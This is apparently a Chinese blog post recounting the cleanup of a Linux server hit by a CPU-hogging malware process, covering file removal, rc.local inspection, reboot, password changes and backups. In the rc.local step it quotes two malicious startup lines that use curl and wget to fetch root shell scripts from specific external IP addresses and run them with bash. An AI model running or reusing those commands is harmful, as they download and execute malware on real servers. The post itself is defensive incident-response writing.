CPU利用率很高 800%爆了

快下班，问题来了

记一次快下班的记录

快下班了，好友发来了一张照片，如下：

中毒了，没问题，肯定是！！！

开始qq对话解决

**有监控吗，快速查看流量图，看看是否发包或者被发包？**
答曰：没有监控
**那查看一下交换机的接口流量呢？**
答曰：交换机是傻瓜二层的
**那看看防火墙的呢？**
查看流量并没有什么影响。

实在是解决太慢了，而对方的机器是内容，最后通过内容的某太机器，我远程朋友的qq桌面，远程服务器，10分钟后终于连接上了。

开始远程解决问题

1、find / -name cranber* #查看占用cpu文件的位置
2、mv /cranber* /cranber.bak 
				#将发包文件移动位置，让程序启动的时候找不到它。
				本次的文件是在/ 根目录下，具体文件名我就不写出来了。
3、cat /etc/rc.local  
				#查看系统启动文件有没有异常的启动项，结果发现了，如下：
					#curl http://207.246.68.21/rootv2.sh > /etc/root.sh ; wget -P /etc http://207.246.68.21/rootv2.sh ; rm -rf /etc/root.sh.* ; bash /etc/root.sh 
					#curl http://172.96.252.86/rootv3.sh > /etc/root.sh ; wget -O /etc/root.sh http://172.96.252.86/rootv3.sh ; bash /etc/root.sh 
4、先将这两行 注释掉再说。
5、查看步骤3 下载下来的root开头的文件
			find / -name root*
			显示都是以root.sh开头的 ，如：root.sh、root.sh.1、root.sh.2、
			目录都在/etc下边
6、移动root.sh 开头的文件到随便一个目录
			mkdir /root/bak
			mv /etc/root.sh* /root/bak
7、重启服务器
			目的是通过重启服务器关掉病毒进程，同时查看还有没有别的病毒脚本，在启动的时候跟着系统启动。
8、系统起来之后
			通过top命令查看，系统已经恢复正常，没有什么异常了。又观察了10分钟，并没有什么问题了。
9、修改密码
			 这时候应该及时修改 系统密码、数据库密码、以及相关的密码。
10、备份数据
			备份相关的重要数据，以便系统如果被黑到无法恢复的地步，还有后手。

总结

初步判断本次中毒原因为密码被漏扫，暴力破解了。

日常运维
		必须有监控
		必须有监控报警
		必须有密码复杂机制
		必须有密码更新机制
		必须有运维技术能力
		（最关键：人外有人、天外有天、还得有人脉）